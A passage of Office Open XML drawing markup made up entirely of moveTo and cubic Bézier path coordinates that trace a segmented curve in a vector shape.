                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1206" y="2129"/>
                    <a:pt x="1213" y="2128"/>
                    <a:pt x="1219" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1221" y="2127"/>
                    <a:pt x="1223" y="2125"/>
                    <a:pt x="1223" y="2123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1222" y="2121"/>
                    <a:pt x="1220" y="2119"/>
                    <a:pt x="1218" y="2120"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1258" y="2113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1251" y="2114"/>
                    <a:pt x="1244" y="2116"/>
                    <a:pt x="1238" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1236" y="2117"/>
                    <a:pt x="1234" y="2119"/>
                    <a:pt x="1235" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1235" y="2123"/>
                    <a:pt x="1237" y="2125"/>
                    <a:pt x="1239" y="2124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1246" y="2123"/>
                    <a:pt x="1252" y="2122"/>
                    <a:pt x="1259" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1261" y="2121"/>
                    <a:pt x="1263" y="2119"/>
                    <a:pt x="1262" y="2116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1262" y="2114"/>
                    <a:pt x="1260" y="2113"/>
                    <a:pt x="1258" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1258" y="2113"/>
                    <a:pt x="1258" y="2113"/>
                    <a:pt x="1258" y="2113"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1297" y="2105"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1290" y="2107"/>
                    <a:pt x="1284" y="2108"/>
                    <a:pt x="1277" y="2109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1275" y="2110"/>
                    <a:pt x="1274" y="2112"/>
                    <a:pt x="1274" y="2114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1274" y="2116"/>
                    <a:pt x="1277" y="2118"/>
                    <a:pt x="1279" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1285" y="2116"/>
                    <a:pt x="1292" y="2115"/>
                    <a:pt x="1298" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="2113"/>
                    <a:pt x="1302" y="2111"/>
                    <a:pt x="1301" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="2106"/>
                    <a:pt x="1299" y="2105"/>
                    <a:pt x="1297" y="2105"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1335" y="2096"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1329" y="2098"/>
                    <a:pt x="1323" y="2099"/>
                    <a:pt x="1316" y="2101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1314" y="2101"/>
                    <a:pt x="1313" y="2104"/>
                    <a:pt x="1313" y="2106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1314" y="2108"/>
                    <a:pt x="1316" y="2109"/>
                    <a:pt x="1318" y="2109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1324" y="2107"/>
                    <a:pt x="1331" y="2106"/>
                    <a:pt x="1337" y="2104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="2103"/>
                    <a:pt x="1341" y="2101"/>
                    <a:pt x="1340" y="2099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="2097"/>
                    <a:pt x="1338" y="2096"/>
                    <a:pt x="1335" y="2096"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1374" y="2085"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1368" y="2087"/>
                    <a:pt x="1361" y="2089"/>
                    <a:pt x="1355" y="2091"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1353" y="2092"/>
                    <a:pt x="1351" y="2094"/>
                    <a:pt x="1352" y="2096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1353" y="2098"/>
                    <a:pt x="1355" y="2099"/>
                    <a:pt x="1357" y="2099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1363" y="2097"/>
                    <a:pt x="1370" y="2095"/>
                    <a:pt x="1376" y="2093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1378" y="2092"/>
                    <a:pt x="1380" y="2090"/>
                    <a:pt x="1379" y="2088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1378" y="2086"/>
                    <a:pt x="1376" y="2085"/>
                    <a:pt x="1374" y="2085"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1412" y="2073"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="2075"/>
                    <a:pt x="1399" y="2077"/>
                    <a:pt x="1393" y="2079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1391" y="2080"/>
                    <a:pt x="1390" y="2082"/>
                    <a:pt x="1390" y="2085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1391" y="2087"/>
                    <a:pt x="1393" y="2088"/>
                    <a:pt x="1395" y="2087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1402" y="2085"/>
                    <a:pt x="1408" y="2083"/>
                    <a:pt x="1414" y="2081"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="2080"/>
                    <a:pt x="1418" y="2078"/>
                    <a:pt x="1417" y="2076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1416" y="2074"/>
                    <a:pt x="1414" y="2072"/>
                    <a:pt x="1412" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1412" y="2073"/>
                    <a:pt x="1412" y="2073"/>
                    <a:pt x="1412" y="2073"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1449" y="2060"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1443" y="2062"/>
                    <a:pt x="1437" y="2064"/>
                    <a:pt x="1431" y="2067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1429" y="2067"/>
                    <a:pt x="1428" y="2070"/>
                    <a:pt x="1428" y="2072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1429" y="2074"/>
                    <a:pt x="1431" y="2075"/>
                    <a:pt x="1433" y="2074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1440" y="2072"/>
                    <a:pt x="1446" y="2069"/>
                    <a:pt x="1452" y="2067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1454" y="2066"/>
                    <a:pt x="1455" y="2064"/>
                    <a:pt x="1455" y="2062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1454" y="2060"/>
                    <a:pt x="1451" y="2059"/>
                    <a:pt x="1449" y="2060"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1486" y="2045"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1480" y="2047"/>
                    <a:pt x="1474" y="2050"/>
                    <a:pt x="1468" y="2052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1466" y="2053"/>
                    <a:pt x="1465" y="2055"/>
                    <a:pt x="1466" y="2057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1467" y="2060"/>
                    <a:pt x="1469" y="2060"/>
                    <a:pt x="1471" y="2060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1477" y="2057"/>
                    <a:pt x="1483" y="2055"/>
                    <a:pt x="1489" y="2052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1491" y="2051"/>
                    <a:pt x="1492" y="2049"/>
                    <a:pt x="1492" y="2047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1491" y="2045"/>
                    <a:pt x="1488" y="2044"/>
                    <a:pt x="1486" y="2045"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486" y="2045"/>
                    <a:pt x="1486" y="2045"/>
                    <a:pt x="1486" y="2045"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1523" y="2028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1517" y="2031"/>
                    <a:pt x="1511" y="2034"/>
                    <a:pt x="1504" y="2037"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1502" y="2037"/>
                    <a:pt x="1502" y="2040"/>
                    <a:pt x="1502" y="2042"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1503" y="2044"/>
                    <a:pt x="1506" y="2045"/>
                    <a:pt x="1508" y="2044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1514" y="2041"/>
                    <a:pt x="1520" y="2038"/>
                    <a:pt x="1526" y="2035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="2035"/>
                    <a:pt x="1529" y="2032"/>
                    <a:pt x="1528" y="2030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1527" y="2028"/>
                    <a:pt x="1525" y="2027"/>
                    <a:pt x="1523" y="2028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1523" y="2028"/>
                    <a:pt x="1523" y="2028"/>
                    <a:pt x="1523" y="2028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="2011"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1552" y="2014"/>
                    <a:pt x="1546" y="2017"/>
                    <a:pt x="1540" y="2020"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1538" y="2021"/>
                    <a:pt x="1538" y="2023"/>
                    <a:pt x="1539" y="2025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1540" y="2027"/>
                    <a:pt x="1542" y="2028"/>
                    <a:pt x="1544" y="2027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1550" y="2024"/>
                    <a:pt x="1556" y="2021"/>
                    <a:pt x="1562" y="2018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="2017"/>
                    <a:pt x="1565" y="2014"/>
                    <a:pt x="1564" y="2012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1563" y="2010"/>
                    <a:pt x="1560" y="2009"/>
                    <a:pt x="1558" y="2011"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="1991"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1587" y="1995"/>
                    <a:pt x="1582" y="1998"/>
                    <a:pt x="1576" y="2001"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574" y="2002"/>
                    <a:pt x="1573" y="2005"/>
                    <a:pt x="1574" y="2007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1575" y="2009"/>
                    <a:pt x="1578" y="2009"/>
                    <a:pt x="1580" y="2008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1585" y="2005"/>
                    <a:pt x="1591" y="2002"/>
                    <a:pt x="1597" y="1998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="1997"/>
                    <a:pt x="1600" y="1995"/>
                    <a:pt x="1599" y="1993"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="1991"/>
                    <a:pt x="1595" y="1990"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1627" y="1971"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1622" y="1975"/>
                    <a:pt x="1616" y="1978"/>
                    <a:pt x="1610" y="1981"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1608" y="1983"/>
                    <a:pt x="1608" y="1985"/>
                    <a:pt x="1609" y="1987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1610" y="1989"/>
                    <a:pt x="1612" y="1989"/>
                    <a:pt x="1614" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1620" y="1985"/>
                    <a:pt x="1626" y="1981"/>
                    <a:pt x="1632" y="1978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="1977"/>
                    <a:pt x="1634" y="1974"/>
                    <a:pt x="1633" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1632" y="1971"/>
                    <a:pt x="1629" y="1970"/>
                    <a:pt x="1627" y="1971"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="1949"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1655" y="1953"/>
                    <a:pt x="1650" y="1957"/>
                    <a:pt x="1644" y="1960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1642" y="1962"/>
                    <a:pt x="1642" y="1964"/>
                    <a:pt x="1643" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1644" y="1968"/>
                    <a:pt x="1647" y="1968"/>
                    <a:pt x="1648" y="1967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1654" y="1964"/>
                    <a:pt x="1660" y="1960"/>
                    <a:pt x="1665" y="1956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="1955"/>
                    <a:pt x="1668" y="1952"/>
                    <a:pt x="1666" y="1951"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1665" y="1949"/>
                    <a:pt x="1663" y="1948"/>
                    <a:pt x="1661" y="1949"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1693" y="1927"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1688" y="1931"/>
                    <a:pt x="1683" y="1934"/>
                    <a:pt x="1677" y="1938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1675" y="1939"/>
                    <a:pt x="1675" y="1942"/>
                    <a:pt x="1676" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1677" y="1946"/>
                    <a:pt x="1680" y="1946"/>
                    <a:pt x="1682" y="1945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1687" y="1941"/>
                    <a:pt x="1693" y="1937"/>
                    <a:pt x="1698" y="1933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1700" y="1932"/>
                    <a:pt x="1700" y="1929"/>
                    <a:pt x="1699" y="1927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1698" y="1926"/>
                    <a:pt x="1695" y="1925"/>
                    <a:pt x="1693" y="1927"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="1902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1907"/>
                    <a:pt x="1715" y="1911"/>
                    <a:pt x="1709" y="1915"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1708" y="1916"/>
                    <a:pt x="1707" y="1919"/>
                    <a:pt x="1709" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1710" y="1922"/>
                    <a:pt x="1712" y="1922"/>
                    <a:pt x="1714" y="1921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1917"/>
                    <a:pt x="1725" y="1913"/>
                    <a:pt x="1730" y="1909"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1732" y="1907"/>
                    <a:pt x="1732" y="1905"/>
                    <a:pt x="1731" y="1903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729" y="1901"/>
                    <a:pt x="1727" y="1901"/>
                    <a:pt x="1725" y="1902"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="1877"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1882"/>
                    <a:pt x="1746" y="1886"/>
                    <a:pt x="1741" y="1890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1739" y="1891"/>
                    <a:pt x="1739" y="1894"/>
                    <a:pt x="1740" y="1896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="1897"/>
                    <a:pt x="1744" y="1898"/>
                    <a:pt x="1746" y="1896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1892"/>
                    <a:pt x="1756" y="1888"/>
                    <a:pt x="1761" y="1883"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1763" y="1882"/>
                    <a:pt x="1763" y="1879"/>
                    <a:pt x="1762" y="1878"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="1876"/>
                    <a:pt x="1758" y="1876"/>
                    <a:pt x="1756" y="1877"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="1851"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1781" y="1855"/>
                    <a:pt x="1776" y="1860"/>
                    <a:pt x="1771" y="1864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1769" y="1866"/>
                    <a:pt x="1769" y="1868"/>
                    <a:pt x="1771" y="1870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="1871"/>
                    <a:pt x="1775" y="1872"/>
                    <a:pt x="1776" y="1870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1781" y="1866"/>
                    <a:pt x="1786" y="1861"/>
                    <a:pt x="1791" y="1857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1793" y="1855"/>
                    <a:pt x="1793" y="1853"/>
                    <a:pt x="1791" y="1851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="1849"/>
                    <a:pt x="1787" y="1849"/>
                    <a:pt x="1786" y="1851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="1851"/>
                    <a:pt x="1786" y="1851"/>
                    <a:pt x="1786" y="1851"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="1823"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="1828"/>
                    <a:pt x="1805" y="1833"/>
                    <a:pt x="1800" y="1837"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1839"/>
                    <a:pt x="1799" y="1841"/>
                    <a:pt x="1800" y="1843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="1844"/>
                    <a:pt x="1804" y="1844"/>
                    <a:pt x="1806" y="1843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="1838"/>
                    <a:pt x="1816" y="1834"/>
                    <a:pt x="1820" y="1829"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1822" y="1827"/>
                    <a:pt x="1822" y="1825"/>
                    <a:pt x="1820" y="1823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="1822"/>
                    <a:pt x="1816" y="1822"/>
                    <a:pt x="1815" y="1823"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="1795"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1838" y="1800"/>
                    <a:pt x="1833" y="1804"/>
                    <a:pt x="1829" y="1809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1827" y="1811"/>
                    <a:pt x="1827" y="1813"/>
                    <a:pt x="1829" y="1815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="1816"/>
                    <a:pt x="1833" y="1816"/>
                    <a:pt x="1834" y="1815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839" y="1810"/>
                    <a:pt x="1844" y="1805"/>
                    <a:pt x="1848" y="1800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="1799"/>
                    <a:pt x="1850" y="1796"/>
                    <a:pt x="1848" y="1795"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="1793"/>
                    <a:pt x="1844" y="1793"/>
                    <a:pt x="1843" y="1795"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1843" y="1795"/>
                    <a:pt x="1843" y="1795"/>
                    <a:pt x="1843" y="1795"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1869" y="1765"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1865" y="1770"/>
                    <a:pt x="1860" y="1775"/>
                    <a:pt x="1856" y="1780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1855" y="1782"/>
                    <a:pt x="1855" y="1784"/>
                    <a:pt x="1856" y="1786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="1787"/>
                    <a:pt x="1860" y="1787"/>
                    <a:pt x="1862" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1866" y="1780"/>
                    <a:pt x="1871" y="1775"/>
                    <a:pt x="1875" y="1770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1877" y="1769"/>
                    <a:pt x="1877" y="1766"/>
                    <a:pt x="1875" y="1765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1873" y="1763"/>
                    <a:pt x="1871" y="1763"/>
                    <a:pt x="1869" y="1765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1869" y="1765"/>
                    <a:pt x="1869" y="1765"/>
                    <a:pt x="1869" y="1765"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="1734"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="1740"/>
                    <a:pt x="1886" y="1745"/>
                    <a:pt x="1882" y="1750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1881" y="1752"/>
                    <a:pt x="1881" y="1754"/>
                    <a:pt x="1883" y="1756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="1757"/>
                    <a:pt x="1887" y="1757"/>
                    <a:pt x="1888" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1893" y="1750"/>
                    <a:pt x="1897" y="1745"/>
                    <a:pt x="1901" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1903" y="1738"/>
                    <a:pt x="1902" y="1735"/>
                    <a:pt x="1901" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="1732"/>
                    <a:pt x="1896" y="1733"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1895" y="1734"/>
                    <a:pt x="1895" y="1734"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1919" y="1703"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="1708"/>
                    <a:pt x="1911" y="1714"/>
                    <a:pt x="1907" y="1719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1906" y="1721"/>
                    <a:pt x="1906" y="1723"/>
                    <a:pt x="1908" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="1726"/>
                    <a:pt x="1912" y="1725"/>
                    <a:pt x="1914" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1918" y="1718"/>
                    <a:pt x="1922" y="1713"/>
                    <a:pt x="1926" y="1708"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1927" y="1706"/>
                    <a:pt x="1927" y="1703"/>
                    <a:pt x="1925" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1923" y="1701"/>
                    <a:pt x="1921" y="1701"/>
                    <a:pt x="1919" y="1703"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="1670"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="1676"/>
                    <a:pt x="1935" y="1681"/>
                    <a:pt x="1931" y="1687"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1930" y="1689"/>
                    <a:pt x="1930" y="1691"/>
                    <a:pt x="1932" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="1694"/>
                    <a:pt x="1936" y="1693"/>
                    <a:pt x="1938" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="1686"/>
                    <a:pt x="1945" y="1681"/>
                    <a:pt x="1949" y="1675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1950" y="1673"/>
                    <a:pt x="1950" y="1671"/>
                    <a:pt x="1948" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1946" y="1668"/>
                    <a:pt x="1944" y="1669"/>
                    <a:pt x="1943" y="1670"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="1637"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="1643"/>
                    <a:pt x="1958" y="1648"/>
                    <a:pt x="1954" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="1656"/>
                    <a:pt x="1953" y="1658"/>
                    <a:pt x="1955" y="1659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="1661"/>
                    <a:pt x="1959" y="1660"/>
                    <a:pt x="1961" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1964" y="1653"/>
                    <a:pt x="1968" y="1647"/>
                    <a:pt x="1971" y="1641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1973" y="1640"/>
                    <a:pt x="1972" y="1637"/>
                    <a:pt x="1970" y="1636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1968" y="1635"/>
                    <a:pt x="1966" y="1635"/>
                    <a:pt x="1965" y="1637"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1985" y="1603"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1982" y="1609"/>
                    <a:pt x="1979" y="1614"/>
                    <a:pt x="1975" y="1620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1974" y="1622"/>
                    <a:pt x="1975" y="1625"/>
                    <a:pt x="1977" y="1626"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1978" y="1627"/>
                    <a:pt x="1981" y="1626"/>
                    <a:pt x="1982" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986" y="1619"/>
                    <a:pt x="1989" y="1613"/>
                    <a:pt x="1992" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1994" y="1605"/>
                    <a:pt x="1993" y="1603"/>
                    <a:pt x="1991" y="1602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="1600"/>
                    <a:pt x="1987" y="1601"/>
                    <a:pt x="1985" y="1603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="1603"/>
                    <a:pt x="1985" y="1603"/>
                    <a:pt x="1985" y="1603"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="1568"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2002" y="1574"/>
                    <a:pt x="1999" y="1580"/>
                    <a:pt x="1995" y="1586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
